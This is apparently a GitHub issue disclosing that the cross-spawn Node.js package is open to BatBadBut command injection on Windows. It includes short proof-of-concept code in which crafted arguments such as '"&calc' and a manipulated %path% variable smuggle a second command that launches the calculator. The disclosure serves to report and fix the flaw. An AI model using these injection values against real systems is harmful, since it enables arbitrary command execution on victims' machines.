Vulnerable to arbitrary command execution on Windows (BatBadBut) #171

@mohd-akram

Description

See https://flatt.tech/research/posts/batbadbut-you-cant-securely-execute-commands-on-windows/

Example:

rem test.cmd
echo %1

Arbitrary execution:

const spawn = require('cross-spawn');
// Launches calculator
spawn.sync('test.cmd', ['"&calc']);

Variable expansion:

// test.js
const spawn = require('cross-spawn');
// Launches calculator
spawn.sync('test.cmd', ['%path%']);

C:\> set path^^=^"^&calc
C:\> node test.js
